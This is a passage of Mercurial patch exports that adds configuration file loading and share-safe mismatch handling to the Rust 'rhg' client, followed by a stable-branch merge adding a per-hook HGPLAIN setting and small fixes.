hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)" = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" +"checksum home 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "2456aef2e6b6a9784192ae780c0f15bc57df0e918585282325e8c8ac27737654" "checksum humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" "checksum im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" "checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -12,6 +12,7 @@ bytes-cast = "0.1" byteorder = "1.3.4" derive_more = "0.99" +home = "0.5" im-rc = "15.0.*" lazy_static = "1.4.0" memchr = "2.3.3" diff --git a/rust/hg-core/src/config.rs b/rust/hg-core/src/config.rs --- a/rust/hg-core/src/config.rs +++ b/rust/hg-core/src/config.rs @@ -12,3 +12,4 @@ mod config; mod layer; pub use config::Config; +pub use layer::{ConfigError, ConfigParseError}; diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -11,8 +11,11 @@ use crate::config::layer::{ ConfigError, ConfigLayer, ConfigParseError, ConfigValue, }; -use std::path::PathBuf; +use crate::utils::files::get_bytes_from_path; +use std::env; +use std::path::{Path, PathBuf}; +use crate::errors::{HgResultExt, IoResultExt}; use crate::repo::Repo; /// Holds the config values for the current repository @@ -50,6 +53,124 @@ } impl Config { + /// Load system and user configuration from various files. + /// + /// This is also affected by some environment variables. + /// + /// TODO: add a parameter for `--config` CLI arguments + pub fn load() -> Result<Self, ConfigError> { + let mut config = Self { layers: Vec::new() }; + let opt_rc_path = env::var_os("HGRCPATH"); + // HGRCPATH replaces system config + if opt_rc_path.is_none() { + config.add_system_config()? + } + config.add_for_environment_variable("EDITOR", b"ui", b"editor"); + config.add_for_environment_variable("VISUAL", b"ui", b"editor"); + config.add_for_environment_variable("PAGER", b"pager", b"pager"); + // HGRCPATH replaces user config + if opt_rc_path.is_none() { + config.add_user_config()? + } + if let Some(rc_path) = &opt_rc_path { + for path in env::split_paths(rc_path) { + if !path.as_os_str().is_empty() { + if path.is_dir() { + config.add_trusted_dir(&path)? + } else { + config.add_trusted_file(&path)? + } + } + } + } + Ok(config) + } + + fn add_trusted_dir(&mut self, path: &Path) -> Result<(), ConfigError> { + if let Some(entries) = std::fs::read_dir(path) + .for_file(path) + .io_not_found_as_none()? + { + for entry in entries { + let file_path = entry.for_file(path)?.path(); + if file_path.extension() == Some(std::ffi::OsStr::new("rc")) { + self.add_trusted_file(&file_path)? + } + } + } + Ok(()) + } + + fn add_trusted_file(&mut self, path: &Path) -> Result<(), ConfigError> { + if let Some(data) = + std::fs::read(path).for_file(path).io_not_found_as_none()? + { + self.layers.extend(ConfigLayer::parse(path, &data)?) + } + Ok(()) + } + + fn add_for_environment_variable( + &mut self, + var: &str, + section: &[u8], + key: &[u8], + ) { + if let Some(value) = env::var_os(var) { + let origin = layer::ConfigOrigin::Environment(var.into()); + let mut layer = ConfigLayer::new(origin); + layer.add( + section.to_owned(), + key.to_owned(), + // `value` is not a path but this works for any `OsStr`: + get_bytes_from_path(value), + None, + ); + self.layers.push(layer) + } + } + + #[cfg(unix)] // TODO: other platforms + fn add_system_config(&mut self) -> Result<(), ConfigError> { + let mut add_for_prefix = |prefix: &Path| -> Result<(), ConfigError> { + let etc = prefix.join("etc").join("mercurial"); + self.add_trusted_file(&etc.join("hgrc"))?; + self.add_trusted_dir(&etc.join("hgrc.d")) + }; + let root = Path::new("/"); + // TODO: use `std::env::args_os().next().unwrap()` a.k.a. argv[0] + // instead? TODO: can this be a relative path? + let hg = crate::utils::current_exe()?; + // TODO: this order (per-installation then per-system) matches + // `systemrcpath()` in `mercurial/scmposix.py`, but + // `mercurial/helptext/config.txt` suggests it should be reversed + if let Some(installation_prefix) = hg.parent().and_then(Path::parent) { + if installation_prefix != root { + add_for_prefix(&installation_prefix)? + } + } + add_for_prefix(root)?; + Ok(()) + } + + #[cfg(unix)] // TODO: other plateforms + fn add_user_config(&mut self) -> Result<(), ConfigError> { + let opt_home = home::home_dir(); + if let Some(home) = &opt_home { + self.add_trusted_file(&home.join(".hgrc"))? + } + let darwin = cfg!(any(target_os = "macos", target_os = "ios")); + if !darwin { + if let Some(config_home) = env::var_os("XDG_CONFIG_HOME") + .map(PathBuf::from) + .or_else(|| opt_home.map(|home| home.join(".config"))) + { + self.add_trusted_file(&config_home.join("hg").join("hgrc"))? + } + } + Ok(()) + } + /// Loads in order, which means that the precedence is the same /// as the order of `sources`. pub fn load_from_explicit_sources( diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -216,7 +216,7 @@ pub fn to_bytes(&self) -> Vec<u8> { match self { ConfigOrigin::File(p) => get_bytes_from_path(p), - ConfigOrigin::Environment(e) => e.to_owned(), + ConfigOrigin::Environment(e) => format_bytes!(b"${}", e), } } } diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -26,11 +26,13 @@ /// Details about where an I/O error happened #[derive(Debug, derive_more::From)] pub enum IoErrorContext { - /// A filesystem operation returned `std::io::Error` + /// A filesystem operation for the given file #[from] File(std::path::PathBuf), - /// `std::env::current_dir` returned `std::io::Error` + /// `std::env::current_dir` CurrentDir, + /// `std::env::current_exe` + CurrentExe, } impl HgError { @@ -69,6 +71,7 @@ match self { IoErrorContext::File(path) => path.display().fmt(f), IoErrorContext::CurrentDir => f.write_str("current directory"), + IoErrorContext::CurrentExe => f.write_str("current executable"), } } } diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -184,3 +184,10 @@ context: IoErrorContext::CurrentDir, }) } + +pub fn current_exe() -> Result<std::path::PathBuf, HgError> { + std::env::current_exe().map_err(|error| HgError::IoError { + error, + context: IoErrorContext::CurrentExe, + }) +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612441075 -3600 # Thu Feb 04 13:17:55 2021 +0100 # Node ID a6e4e4650bac1e13819b36266083eec36022ca5a # Parent 2845892dd48903f1928ba19aa0da67fb4682851e rhg: Parse system and user configuration at program start … and pass it around up to `Repo::find` Differential Revision: https://phab.mercurial-scm.org/D9962 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,3 +1,4 @@ +use crate::config::Config; use crate::errors::{HgError, IoResultExt}; use crate::requirements; use crate::utils::files::get_path_from_bytes; @@ -31,7 +32,7 @@ impl Repo { /// Search the current directory and its ancestores for a repository: /// a working directory that contains a `.hg` sub-directory. - pub fn find() -> Result<Self, RepoFindError> { + pub fn find(_config: &Config) -> Result<Self, RepoFindError> { let current_directory = crate::utils::current_dir()?; // ancestors() is inclusive: it first yields `current_directory` as-is. for ancestor in current_directory.ancestors() { diff --git a/rust/rhg/src/commands.rs b/rust/rhg/src/commands.rs --- a/rust/rhg/src/commands.rs +++ b/rust/rhg/src/commands.rs @@ -5,10 +5,11 @@ pub mod root; use crate::error::CommandError; use crate::ui::Ui; +use hg::config::Config; /// The common trait for rhg commands /// /// Normalize the interface of the commands provided by rhg pub trait Command { - fn run(&self, ui: &Ui) -> Result<(), CommandError>; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError>; } diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,6 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use hg::config::Config; use hg::operations::cat; use hg::repo::Repo; use hg::utils::hg_path::HgPathBuf; @@ -29,8 +30,8 @@ impl<'a> Command for CatCommand<'a> { #[timed] - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { + let repo = Repo::find(config)?; let cwd = hg::utils::current_dir()?; let mut files = vec![]; diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,6 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use hg::config::Config; use hg::operations::{debug_data, DebugDataKind}; use hg::repo::Repo; use micro_timer::timed; @@ -22,8 +23,8 @@ impl<'a> Command for DebugDataCommand<'a> { #[timed] - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { + let repo = Repo::find(config)?; let data = debug_data(&repo, self.rev, self.kind) .map_err(|e| (e, self.rev))?; diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -1,6 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use hg::config::Config; use hg::repo::Repo; pub const HELP_TEXT: &str = " @@ -16,8 +17,8 @@ } impl Command for DebugRequirementsCommand { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { + let repo = Repo::find(config)?; let mut output = String::new(); let mut requirements: Vec<_> = repo.requirements().iter().collect(); requirements.sort(); diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,6 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use hg::config::Config; use hg::operations::list_rev_tracked_files; use hg::operations::Dirstate; use hg::repo::Repo; @@ -46,8 +47,8 @@ } impl<'a> Command for FilesCommand<'a> { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { + let repo = Repo::find(config)?; if let Some(rev) = self.rev { let files = list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -2,6 +2,7 @@ use crate::error::CommandError; use crate::ui::Ui; use format_bytes::format_bytes; +use hg::config::Config; use hg::repo::Repo; use hg::utils::files::get_bytes_from_path; @@ -20,8 +21,8 @@ } impl Command for RootCommand { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { + let repo = Repo::find(config)?; let bytes = get_bytes_from_path(repo.working_directory_path()); ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; Ok(()) diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,6 +1,7 @@ use crate::ui::utf8_to_local; use crate::ui::UiError; use format_bytes::format_bytes; +use hg::config::{ConfigError, ConfigParseError}; use hg::errors::HgError; use hg::repo::RepoFindError; use hg::revlog::revlog::RevlogError; @@ -66,6 +67,36 @@ } } +impl From<ConfigError> for CommandError { + fn from(error: ConfigError) -> Self { + match error { + ConfigError::Parse(ConfigParseError { + origin, + line, + bytes, + }) => { + let line_message = if let Some(line_number) = line { + format_bytes!( + b" at line {}", + line_number.to_string().into_bytes() + ) + } else { + Vec::new() + }; + CommandError::Abort { + message: format_bytes!( + b"config parse error in {}{}: '{}'", + origin.to_bytes(), + line_message, + bytes + ), + } + } + ConfigError::Other(error) => error.into(), + } + } +} + impl From<(RevlogError, &str)> for CommandError { fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -123,20 +123,23 @@ matches: ArgMatches, ui: &ui::Ui, ) -> Result<(), CommandError> { + let config = hg::config::Config::load()?; + match matches.subcommand() { - ("root", _) => commands::root::RootCommand::new().run(&ui), + ("root", _) => commands::root::RootCommand::new().run(&ui, &config), ("files", Some(matches)) => { - commands::files::FilesCommand::try_from(matches)?.run(&ui) + commands::files::FilesCommand::try_from(matches)?.run(&ui, &config) } ("cat", Some(matches)) => { - commands::cat::CatCommand::try_from(matches)?.run(&ui) + commands::cat::CatCommand::try_from(matches)?.run(&ui, &config) } ("debugdata", Some(matches)) => { - commands::debugdata::DebugDataCommand::try_from(matches)?.run(&ui) + commands::debugdata::DebugDataCommand::try_from(matches)? + .run(&ui, &config) } ("debugrequirements", _) => { commands::debugrequirements::DebugRequirementsCommand::new() - .run(&ui) + .run(&ui, &config) } _ => unreachable!(), // Because of AppSettings::SubcommandRequired, } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612445387 -3600 # Thu Feb 04 14:29:47 2021 +0100 # Node ID f031fe1c6ededaee65a2823ea109daeae49fa4ad # Parent a6e4e4650bac1e13819b36266083eec36022ca5a rhg: Abort based on config on share-safe mismatch Differential Revision: https://phab.mercurial-scm.org/D9963 diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -8,7 +8,9 @@ context: IoErrorContext, }, - /// A file under `.hg/` normally only written by Mercurial + /// A file under `.hg/` normally only written by Mercurial is not in the + /// expected format. This indicates a bug in Mercurial, filesystem + /// corruption, or hardware failure. /// /// The given string is a short explanation for users, not intended to be /// machine-readable. @@ -21,6 +23,12 @@ /// The given string is a short explanation for users, not intended to be /// machine-readable. UnsupportedFeature(String), + + /// Operation cannot proceed for some other reason. + /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + Abort(String), } /// Details about where an I/O error happened @@ -46,6 +54,9 @@ pub fn unsupported(explanation: impl Into<String>) -> Self { HgError::UnsupportedFeature(explanation.into()) } + pub fn abort(explanation: impl Into<String>) -> Self { + HgError::Abort(explanation.into()) + } } // TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? @@ -61,6 +72,7 @@ HgError::UnsupportedFeature(explanation) => { write!(f, "unsupported feature: {}", explanation) } + HgError::Abort(explanation) => explanation.fmt(f), } } } diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -32,12 +32,12 @@ impl Repo { /// Search the current directory and its ancestores for a repository: /// a working directory that contains a `.hg` sub-directory. - pub fn find(_config: &Config) -> Result<Self, RepoFindError> { + pub fn find(config: &Config) -> Result<Self, RepoFindError> { let current_directory = crate::utils::current_dir()?; // ancestors() is inclusive: it first yields `current_directory` as-is. for ancestor in current_directory.ancestors() { if ancestor.join(".hg").is_dir() { - return Ok(Self::new_at_path(ancestor.to_owned())?); + return Ok(Self::new_at_path(ancestor.to_owned(), config)?); } } Err(RepoFindError::NotFoundInCurrentDirectoryOrAncestors { @@ -46,7 +46,10 @@ } /// To be called after checking that `.hg` is a sub-directory - fn new_at_path(working_directory: PathBuf) -> Result<Self, HgError> { + fn new_at_path( + working_directory: PathBuf, + config: &Config, + ) -> Result<Self, HgError> { let dot_hg = working_directory.join(".hg"); let hg_vfs = Vfs { base: &dot_hg }; @@ -95,11 +98,23 @@ requirements::load(Vfs { base: &shared_path })? .contains(requirements::SHARESAFE_REQUIREMENT); - // TODO: support for `share.safe-mismatch.*` config if share_safe && !source_is_share_safe { - return Err(HgError::unsupported("share-safe downgrade")); + return Err(match config.get(b"safe-mismatch", b"source-not-safe") { + Some(b"abort") | None => HgError::abort( + "share source does not support share-safe requirement" + ), + _ => HgError::unsupported("share-safe downgrade") + }); } else if source_is_share_safe && !share_safe { - return Err(HgError::unsupported("share-safe upgrade")); + return Err( + match config.get(b"safe-mismatch", b"source-safe") { + Some(b"abort") | None => HgError::abort( + "version mismatch: source uses share-safe \ + functionality while the current share does not", + ), + _ => HgError::unsupported("share-safe upgrade"), + }, + ); } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612447493 -3600 # Thu Feb 04 15:04:53 2021 +0100 # Node ID d7685105e504d6d964b32adc7b11234841e5f54f # Parent f031fe1c6ededaee65a2823ea109daeae49fa4ad rhg: Parse per-repository configuration Differential Revision: https://phab.mercurial-scm.org/D9964 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -16,7 +16,6 @@ use std::path::{Path, PathBuf}; use crate::errors::{HgResultExt, IoResultExt}; -use crate::repo::Repo; /// Holds the config values for the current repository /// TODO update this docstring once we support more sources @@ -196,12 +195,28 @@ Ok(Config { layers }) } - /// Loads the local config. In a future version, this will also load the - /// `$HOME/.hgrc` and more to mirror the Python implementation. - pub fn load_for_repo(repo: &Repo) -> Result<Self, ConfigError> { - Ok(Self::load_from_explicit_sources(vec![ - ConfigSource::AbsPath(repo.hg_vfs().join("hgrc")), - ])?) + /// Loads the per-repository config into a new `Config` which is combined + /// with `self`. + pub(crate) fn combine_with_repo( + &self, + repo_config_files: &[PathBuf], + ) -> Result<Self, ConfigError> { + let (cli_layers, other_layers) = self + .layers + .iter() + .cloned() + .partition(ConfigLayer::is_from_command_line); + + let mut repo_config = Self { + layers: other_layers, + }; + for path in repo_config_files { + // TODO: check if this file should be trusted: + // `mercurial/ui.py:427` + repo_config.add_trusted_file(path)?; + } + repo_config.layers.extend(cli_layers); + Ok(repo_config) } /// Returns an `Err` if the first value found is not a valid boolean. @@ -297,8 +312,6 @@ let config = Config::load_from_explicit_sources(sources) .expect("expected valid config"); - dbg!(&config); - let (_, value) = config.get_inner(b"section", b"item").unwrap(); assert_eq!( value, diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -51,6 +51,15 @@ } } + /// Returns whether this layer comes from `--config` CLI arguments + pub(crate) fn is_from_command_line(&self) -> bool { + if let ConfigOrigin::CommandLine = self.origin { + true + } else { + false + } + } + /// Add an entry to the config, overwriting the old one if already present. pub fn add( &mut self, @@ -97,11 +106,13 @@ if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; // `Path::parent` only fails for the root directory, - // which `src` can’t be since we’ve managed to open it as a file. + // which `src` can’t be since we’ve managed to open it as a + // file. let dir = src .parent() .expect("Path::parent fail on a file we’ve read"); - // `Path::join` with an absolute argument correctly ignores the base path + // `Path::join` with an absolute argument correctly ignores the + // base path let filename = dir.join(&get_path_from_bytes(&filename_bytes)); let data = std::fs::read(&filename).for_file(&filename)?; layers.push(current_layer); @@ -200,9 +211,11 @@ #[derive(Clone, Debug)] pub enum ConfigOrigin { - /// The value comes from a configuration file + /// From a configuration file File(PathBuf), - /// The value comes from the environment like `$PAGER` or `$EDITOR` + /// From a `--config` CLI argument + CommandLine, + /// From environment variables like `$PAGER` or `$EDITOR` Environment(Vec<u8>), /* TODO cli * TODO defaults (configitems.py) @@ -216,6 +229,7 @@ pub fn to_bytes(&self) -> Vec<u8> { match self { ConfigOrigin::File(p) => get_bytes_from_path(p), + ConfigOrigin::CommandLine => b"--config".to_vec(), ConfigOrigin::Environment(e) => format_bytes!(b"${}", e), } } diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,4 +1,4 @@ -use crate::config::Config; +use crate::config::{Config, ConfigError, ConfigParseError}; use crate::errors::{HgError, IoResultExt}; use crate::requirements; use crate::utils::files::get_path_from_bytes; @@ -12,17 +12,29 @@ dot_hg: PathBuf, store: PathBuf, requirements: HashSet<String>, + config: Config, } #[derive(Debug, derive_more::From)] -pub enum RepoFindError { - NotFoundInCurrentDirectoryOrAncestors { +pub enum RepoError { + NotFound { current_directory: PathBuf, }, #[from] + ConfigParseError(ConfigParseError), + #[from] Other(HgError), } +impl From<ConfigError> for RepoError { + fn from(error: ConfigError) -> Self { + match error { + ConfigError::Parse(error) => error.into(), + ConfigError::Other(error) => error.into(), + } + } +} + /// Filesystem access abstraction for the contents of a given "base" diretory #[derive(Clone, Copy)] pub(crate) struct Vfs<'a> { @@ -32,7 +44,7 @@ impl Repo { /// Search the current directory and its ancestores for a repository: /// a working directory that contains a `.hg` sub-directory. - pub fn find(config: &Config) -> Result<Self, RepoFindError> { + pub fn find(config: &Config) -> Result<Self, RepoError> { let current_directory = crate::utils::current_dir()?; // ancestors() is inclusive: it first yields `current_directory` as-is. for ancestor in current_directory.ancestors() { @@ -40,18 +52,20 @@ return Ok(Self::new_at_path(ancestor.to_owned(), config)?); } } - Err(RepoFindError::NotFoundInCurrentDirectoryOrAncestors { - current_directory, - }) + Err(RepoError::NotFound { current_directory }) } /// To be called after checking that `.hg` is a sub-directory fn new_at_path( working_directory: PathBuf, config: &Config, - ) -> Result<Self, HgError> { + ) -> Result<Self, RepoError> { let dot_hg = working_directory.join(".hg"); + let mut repo_config_files = Vec::new(); + repo_config_files.push(dot_hg.join("hgrc")); + repo_config_files.push(dot_hg.join("hgrc-not-shared")); + let hg_vfs = Vfs { base: &dot_hg }; let mut reqs = requirements::load_if_exists(hg_vfs)?; let relative = @@ -89,7 +103,8 @@ return Err(HgError::corrupted(format!( ".hg/sharedpath points to nonexistent directory {}", shared_path.display() - ))); + )) + .into()); } store_path = shared_path.join("store"); @@ -99,12 +114,15 @@ .contains(requirements::SHARESAFE_REQUIREMENT); if share_safe && !source_is_share_safe { - return Err(match config.get(b"safe-mismatch", b"source-not-safe") { + return Err(match config + .get(b"safe-mismatch", b"source-not-safe") + { Some(b"abort") | None => HgError::abort( - "share source does not support share-safe requirement" + "share source does not support share-safe requirement", ), - _ => HgError::unsupported("share-safe downgrade") - }); + _ => HgError::unsupported("share-safe downgrade"), + } + .into()); } else if source_is_share_safe && !share_safe { return Err( match config.get(b"safe-mismatch", b"source-safe") { @@ -113,16 +131,24 @@ functionality while the current share does not", ), _ => HgError::unsupported("share-safe upgrade"), - }, + } + .into(), ); } + + if share_safe { + repo_config_files.insert(0, shared_path.join("hgrc")) + } } + let repo_config = config.combine_with_repo(&repo_config_files)?; + let repo = Self { requirements: reqs, working_directory, store: store_path, dot_hg, + config: repo_config, }; requirements::check(&repo)?; @@ -138,6 +164,10 @@ &self.requirements } + pub fn config(&self) -> &Config { + &self.config + } + /// For accessing repository files (in `.hg`), except for the store /// (`.hg/store`). pub(crate) fn hg_vfs(&self) -> Vfs<'_> { diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -3,7 +3,7 @@ use format_bytes::format_bytes; use hg::config::{ConfigError, ConfigParseError}; use hg::errors::HgError; -use hg::repo::RepoFindError; +use hg::repo::RepoError; use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; use std::convert::From; @@ -51,18 +51,17 @@ } } -impl From<RepoFindError> for CommandError { - fn from(error: RepoFindError) -> Self { +impl From<RepoError> for CommandError { + fn from(error: RepoError) -> Self { match error { - RepoFindError::NotFoundInCurrentDirectoryOrAncestors { - current_directory, - } => CommandError::Abort { + RepoError::NotFound { current_directory } => CommandError::Abort { message: format_bytes!( b"no repository found in '{}' (.hg not found)!", get_bytes_from_path(current_directory) ), }, - RepoFindError::Other(error) => error.into(), + RepoError::ConfigParseError(error) => error.into(), + RepoError::Other(error) => error.into(), } } } @@ -70,33 +69,35 @@ impl From<ConfigError> for CommandError { fn from(error: ConfigError) -> Self { match error { - ConfigError::Parse(ConfigParseError { - origin, - line, - bytes, - }) => { - let line_message = if let Some(line_number) = line { - format_bytes!( - b" at line {}", - line_number.to_string().into_bytes() - ) - } else { - Vec::new() - }; - CommandError::Abort { - message: format_bytes!( - b"config parse error in {}{}: '{}'", - origin.to_bytes(), - line_message, - bytes - ), - } - } + ConfigError::Parse(error) => error.into(), ConfigError::Other(error) => error.into(), } } } +impl From<ConfigParseError> for CommandError { + fn from(error: ConfigParseError) -> Self { + let ConfigParseError { + origin, + line, + bytes, + } = error; + let line_message = if let Some(line_number) = line { + format_bytes!(b" at line {}", line_number.to_string().into_bytes()) + } else { + Vec::new() + }; + CommandError::Abort { + message: format_bytes!( + b"config parse error in {}{}: '{}'", + origin.to_bytes(), + line_message, + bytes + ), + } + } +} + impl From<(RevlogError, &str)> for CommandError { fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1613104606 28800 # Thu Feb 11 20:36:46 2021 -0800 # Node ID d67732a4b58a3f11e2d4f2e2aa85d759738a6dff # Parent d7685105e504d6d964b32adc7b11234841e5f54f # Parent b910be772eb9bc0b62bd3bc421a2084d3ac72c9f branching: merge with stable diff --git a/hgext/largefiles/overrides.py b/hgext/largefiles/overrides.py --- a/hgext/largefiles/overrides.py +++ b/hgext/largefiles/overrides.py @@ -1853,7 +1853,7 @@ @eh.wrapfunction(urlmod, b'open') -def openlargefile(orig, ui, url_, data=None): +def openlargefile(orig, ui, url_, data=None, **kwargs): if url_.startswith(_lfscheme): if data: msg = b"cannot use data on a 'largefile://' url" @@ -1861,4 +1861,4 @@ lfid = url_[len(_lfscheme) :] return storefactory.getlfile(ui, lfid) else: - return orig(ui, url_, data=data) + return orig(ui, url_, data=data, **kwargs) diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -3145,7 +3145,7 @@ # avoid reporting something like "committed new head" when # recommitting old changesets, and issue a helpful warning # for most instances - repo.ui.warn(_("warning: commit already existed in the repository!\n")) + repo.ui.warn(_(b"warning: commit already existed in the repository!\n")) elif ( not opts.get(b'amend') and bheads diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1333,11 +1333,17 @@ ) coreconfigitem( b'hooks', - b'.*', + b'[^:]*', default=dynamicdefault, generic=True, ) coreconfigitem( + b'hooks', + b'.*:run-with-plain', + default=True, + generic=True, +) +coreconfigitem( b'hgweb-paths', b'.*', default=list, diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1027,6 +1027,13 @@ incoming.autobuild = /my/build/hook # force autobuild hook to run before other incoming hooks priority.incoming.autobuild = 1 + ### control HGPLAIN setting when running autobuild hook + # HGPLAIN always set (default from Mercurial 5.7) + incoming.autobuild:run-with-plain = yes + # HGPLAIN never set + incoming.autobuild:run-with-plain = no + # HGPLAIN inherited from environment (default before Mercurila 5.7) + incoming.autobuild:run-with-plain = auto Most hooks are run with environment variables set that give useful additional information. For each hook below, the environment variables diff --git a/mercurial/hook.py b/mercurial/hook.py --- a/mercurial/hook.py +++ b/mercurial/hook.py @@ -157,7 +157,15 @@ env[b'HG_PENDING'] = repo.root env[b'HG_HOOKTYPE'] = htype env[b'HG_HOOKNAME'] = name - env[b'HGPLAIN'] = b'1' + + if ui.config(b'hooks', b'%s:run-with-plain' % name) == b'auto': + plain = ui.plain() + else: + plain = ui.configbool(b'hooks', b'%s:run-with-plain' % name) + if plain: + env[b'HGPLAIN'] = b'1' + else: + env[b'HGPLAIN'] = b'' for k, v in pycompat.iteritems(args): # transaction changes can accumulate MBs of data, so skip it @@ -224,7 +232,11 @@ """return all hooks items ready to be sorted""" hooks = {} for name, cmd in ui.configitems(b'hooks', untrusted=_untrusted): - if name.startswith(b'priority.') or name.startswith(b'tonative.'): + if ( + name.startswith(b'priority.') + or name.startswith(b'tonative.') + or b':' in name + ): continue priority = ui.configint(b'hooks', b'priority.%s' % name, 0) diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -60,8 +60,6 @@ # The config knobs that will be altered (if unset) by ui.tweakdefaults. tweakrc = b""" [ui] -# Gives detailed exit codes for input/user errors, config errors, etc. -detailed-exit-code = True # The rollback command is dangerous. As a rule, don't use it. rollback = False # Make `hg status` report copy information diff --git a/mercurial/utils/procutil.py b/mercurial/utils/procutil.py --- a/mercurial/utils/procutil.py +++ b/mercurial/utils/procutil.py @@ -546,7 +546,11 @@ # pure build; use a safe default return True else: - return pycompat.iswindows or encoding.environ.get(b"DISPLAY") + return ( + pycompat.iswindows + or encoding.environ.get(b"DISPLAY") + or encoding.environ.get(b"WAYLAND_DISPLAY") + ) def gui(): diff --git a/relnotes/5.7 b/relnotes/5.7 --- a/relnotes/5.7 +++ b/relnotes/5.7 @@ -19,9 +19,6 @@ * `hg purge` is now a core command using `--confirm` by default. - * `hg strip`, from the strip extension, is now a core command, `hg - debugstrip`. The extension remains for compatibility. - * `hg diff` and `hg 